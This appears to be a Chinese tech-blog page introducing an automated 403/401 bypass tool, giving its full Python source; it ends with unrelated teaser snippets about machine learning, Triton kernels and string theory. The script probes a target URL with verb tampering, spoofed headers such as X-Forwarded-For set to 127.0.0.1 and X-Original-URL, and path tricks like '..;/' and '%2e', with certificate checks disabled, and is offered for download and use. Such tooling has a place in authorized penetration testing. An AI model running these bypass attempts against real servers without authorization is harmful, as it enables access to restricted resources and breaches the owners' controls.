news 2026/4/23 15:50:46

一款自动化的403/401绕过测试工具

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
一款自动化的403/401绕过测试工具

工具介绍

一款自动化的403/401绕过测试工具,集成了路径规范化、请求头注入及谓词篡改等多种实战技巧。

工具使用

python run.py -u http://xx.com

run.py

import requests import argparse import urllib3 from urllib.parse import urlparse # 忽略 SSL 警告 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class BypassScanner: def __init__(self, target_url): self.target = target_url.rstrip('/') self.path = urlparse(target_url).path self.headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AF-Service-Scanner/1.0" } def scan(self): print(f"[*] Starting Bypass Scan for: {self.target}\n") # 1. 谓词篡改 (Verb Tampering) methods = ["GET", "POST", "HEAD", "PUT", "TRACE", "OPTIONS"] for m in methods: self._request(m, self.target, title=f"Method: {m}") # 2. Header 注入 bypass_headers = [ {"X-Forwarded-For": "127.0.0.1"}, {"X-Custom-IP-Authorization": "127.0.0.1"}, {"X-Original-URL": self.path}, {"X-Rewrite-URL": self.path}, {"X-Remote-IP": "127.0.0.1"}, {"X-Host": "127.0.0.1"} ] for h in bypass_headers: self._request("GET", self.target, headers=h, title=f"Header: {list(h.keys())[0]}") # 3. 路径变形 (Path Fuzzing) # 包含你提到的 ..;/ 和 ../ path_payloads = [ f"{self.target}/", f"{self.target}/.", f"{self.target}..;/", f"{self.target}/..;/", f"{self.target}/%2e/", f"{self.target}//", f"{self.target}.json" ] for p in path_payloads: self._request("GET", p, title=f"Path: {p.replace(self.target, '')}") def _request(self, method, url, headers=None, title=""): test_headers = self.headers.copy() if headers: test_headers.update(headers) try: resp = requests.request(method, url, headers=test_headers, verify=False, timeout=5, allow_redirects=False) color = "\033[92m" if resp.status_code == 200 else "\033[90m" print(f"{color}[{resp.status_code}] {title} \033[0m") except Exception as e: print(f"[!] Error on {title}: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="403/401 Bypass Automation Tool") parser.add_argument("-u", "--url", required=True, help="Target URL (e.g., https://example.com/admin)") args = parser.parse_args() scanner = BypassScanner(args.url) scanner.scan()

工具下载

https://github.com/Adonis-363/403-
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/23 13:31:29

机器学习优化投资组合压力测试

机器学习优化投资组合压力测试 关键词:机器学习、投资组合、压力测试、优化、风险评估 摘要:本文聚焦于利用机器学习技术优化投资组合压力测试。首先介绍了投资组合压力测试的背景知识,包括其目的、适用读者以及文档结构。接着阐述了相关核心概念,如投资组合、压力测试和机…

作者头像 李华
网站建设 2026/4/23 13:54:35

算子优化实战:手写 Triton Kernel,将 LayerNorm 算子的执行时间压缩 50%

标签: #Triton #CUDA #AICompiler #HPC #PyTorch #LayerNorm 📉 前言:为什么 PyTorch 原生算子还不够快? PyTorch 的 torch.nn.LayerNorm 虽然底层调用了 cuDNN 或 ATen 的优化实现,但在处理特定 Shape 或与其他算子结合时,依然存在性能损耗: 显存带宽瓶颈:LayerNorm…

作者头像 李华
网站建设 2026/4/23 13:04:18

机器学习周报三十一

文章目录摘要Abstract1 TripleFDS2 Flux-Text总结摘要 本周看了两篇关于场景文本编辑的论文,达到了最新的SoTA的论文,学习到了数据集构建和损失函数构造对模型性能提升至关重要。 Abstract This week, I read two papers on scene text editing, both…

作者头像 李华
网站建设 2026/4/23 14:55:14

关于弦理论的十维自洽的个人见解

近日,看到一篇关于弦理论需要十维才能自洽的科普类作品,其中提到人类世界处在31个维度里面(即三维世界加时间轴的四维空间里),从数学角度似乎另外6个维度是假设它们在极小尺寸下才能让理论得以运行。 我个人有个看法&a…

作者头像 李华